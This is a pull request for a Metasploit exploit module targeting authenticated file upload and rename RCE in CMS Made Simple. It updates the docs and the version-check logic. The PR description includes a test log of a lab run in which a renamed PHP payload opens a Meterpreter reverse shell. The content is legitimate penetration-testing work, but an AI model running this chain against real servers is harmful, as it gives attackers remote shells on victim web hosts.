### PR TITLE
Update cmsms_upload_rename_rce check and docs

### DIFF
--- a/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md
+++ b/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md
@@ -1,6 +1,11 @@
 ## Description
 
-CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file and rename it to have a .php extension. The file can then be executed by opening the URL of the file in the /uploads/ directory.
+  CMS Made Simple allows an authenticated administrator to upload a file
+  and rename it to have a `.php` extension. The file can then be executed
+  by opening the URL of the file in the `/uploads/` directory.
+
+  This module has been successfully tested on CMS Made Simple versions
+  2.2.5 and 2.2.7.
 
 ## Vulnerable Application
 

--- a/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
+++ b/modules/exploits/multi/http/cmsms_upload_rename_rce.rb
@@ -12,9 +12,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'            => 'CMS Made Simple Authenticated RCE via File Upload/Copy',
       'Description'     => %q{
-        CMS Made Simple v2.2.5 allows an authenticated administrator to upload a file
-        and rename it to have a .php extension. The file can then be executed by opening
-        the URL of the file in the /uploads/ directory.
+        CMS Made Simple allows an authenticated administrator to upload a file
+        and rename it to have a .php extension. The file can then be executed
+        by opening the URL of the file in the /uploads/ directory.
+
+        This module has been successfully tested on CMS Made Simple versions
+        2.2.5 and 2.2.7.
       },
       'Author' =>
         [
@@ -62,22 +65,20 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown
     end
 
-    unless res.body =~ /CMS Made Simple<\/a> version (\d+\.\d+\.\d+)/
-      return CheckCode::Unknown
+    unless res.body =~ /CMS Made Simple/i
+      return CheckCode::Safe
     end
 
-    version = Gem::Version.new($1)
-    vprint_status("#{peer} - CMS Made Simple Version: #{version}")
+    if res.body =~ %r{CMS Made Simple</a> version (\d+\.\d+\.\d+)}i
+      version = Gem::Version.new($1)
+      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
 
-    if version == Gem::Version.new('2.2.5')
-      return CheckCode::Appears
+      if version == Gem::Version.new('2.2.5')
+        return CheckCode::Appears
+      end
     end
 
-    if version < Gem::Version.new('2.2.5')
-      return CheckCode::Detected
-    end
-
-    CheckCode::Safe
+    CheckCode::Detected
   end
 
   def exploit


### PR DESCRIPTION
Tested on CMS Made Simple version 2.2.7.

```
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] 172.16.191.253:80 - CMS Made Simple Version: 2.2.7
[+] 172.16.191.253:80 - Authentication successful
[+] 172.16.191.253:80 - File uploaded FZOLMuIj.txt
[+] 172.16.191.253:80 - File renamed FZOLMuIj.php
[*] Sending stage (37775 bytes) to 172.16.191.253

^C[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/cmsms_upload_rename_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information             Connection
  --  ----  ----                   -----------             ----------
  1         meterpreter php/linux  www-data (33) @ ubuntu  172.16.191.188:4444 -> 172.16.191.253:40006 (172.16.191.253)

msf5 exploit(multi/http/cmsms_upload_rename_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.191.253 - Meterpreter session 1 closed.  Reason: User exit
```
